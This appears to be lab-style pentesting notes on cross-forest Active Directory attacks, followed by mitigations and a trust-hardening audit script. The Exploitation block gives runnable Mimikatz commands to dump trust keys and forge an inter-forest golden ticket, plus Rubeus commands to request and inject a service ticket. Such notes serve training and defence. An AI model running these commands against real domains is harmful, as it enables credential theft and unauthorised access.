# Cross Forest Attacks

## General

* Same attack flow as with cross-domain attacks
* But: trusts between forests must be established manually
* No implicit trust
* Cannot abuse SID history because of SID filtering
* We only get the privileges that the user we are impersonating has in the target forest

## Exploitation

```powershell
# Get trust key for the inter-forest trust
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\ecorp$"'

# Forge inter-forest TGT
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /user:Administrator /target:eurocorp.local /rc4:9a3dafc4139bc3fb7b6dade2a35d6f74 /service:krbtgt /ticket:forest_tgt.kirbi"'

# Request and inject TGS for CIFS service using Rubeus
.\Rubeus.exe asktgs /ticket:forest_tgt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

# Check access
ls \\eurocorp-dc.eurocorp.local\SharedWithDCorp\
```

## Mitigation

### SID Filtering

* Prevents attacks that abuse the SID history attribute across a forest trust
* Enabled by default on all inter-forest trusts. Intra-forest trusts are assumed to be secure by default (Microsoft considers the forest, not the domain, to be the security boundary)
* But since SID filtering has the potential to break applications and user access, it is often disabled

### Selective Authentication

* If configured on an inter-forest trust, users crossing the trust are not authenticated automatically
* Individual access to domains and servers in the trusting domain/forest should be given
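
Both mitigations above are stored as bits in a trust's `trustAttributes` value, so they can be audited. The following is an added example, not part of the original page: `Test-TrustHardening` is a hypothetical helper name, the sample trust objects are constructed, and the bit values are the `trustAttributes` flags documented in MS-ADTS.

```powershell
# trustAttributes flags (MS-ADTS)
$QUARANTINED_DOMAIN = 0x04   # SID filtering (quarantine) on an external trust
$FOREST_TRANSITIVE  = 0x08   # forest trust
$CROSS_ORGANIZATION = 0x10   # selective authentication
$WITHIN_FOREST      = 0x20   # intra-forest trust
$TREAT_AS_EXTERNAL  = 0x40   # forest trust with SID filtering relaxed (SID history allowed)

function Test-TrustHardening {   # hypothetical helper name
    param([Parameter(ValueFromPipeline)] $Trust)
    process {
        $attr = [int]$Trust.TrustAttributes
        # Intra-forest trusts are skipped: the forest, not the domain, is the boundary.
        if ($attr -band $WITHIN_FOREST) { return }

        $isForest = [bool]($attr -band $FOREST_TRANSITIVE)
        # Forest trusts filter by default unless TREAT_AS_EXTERNAL is set;
        # external trusts filter only when quarantine is set.
        $sidFiltering = if ($isForest) {
            -not ($attr -band $TREAT_AS_EXTERNAL)
        } else {
            [bool]($attr -band $QUARANTINED_DOMAIN)
        }
        $selective = [bool]($attr -band $CROSS_ORGANIZATION)

        $findings = @()
        if (-not $sidFiltering) { $findings += 'SID filtering disabled or relaxed' }
        if (-not $selective)    { $findings += 'no selective authentication' }

        [pscustomobject]@{
            Trust                   = $Trust.Name
            Type                    = if ($isForest) { 'Forest' } else { 'External' }
            SidFiltering            = $sidFiltering
            SelectiveAuthentication = $selective
            Findings                = $findings -join '; '
        }
    }
}

# Constructed sample input. With the ActiveDirectory module available, use instead:
#   Get-ADTrust -Filter * | Test-TrustHardening
$sample = @(
    [pscustomobject]@{ Name = 'partner-a.example'; TrustAttributes = 0x08 }  # forest trust, defaults
    [pscustomobject]@{ Name = 'partner-b.example'; TrustAttributes = 0x48 }  # forest trust, SID history enabled
    [pscustomobject]@{ Name = 'partner-c.example'; TrustAttributes = 0x18 }  # forest trust, selective auth
    [pscustomobject]@{ Name = 'child.example';     TrustAttributes = 0x20 }  # intra-forest, skipped
)
$sample | Test-TrustHardening | Format-Table -AutoSize
```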


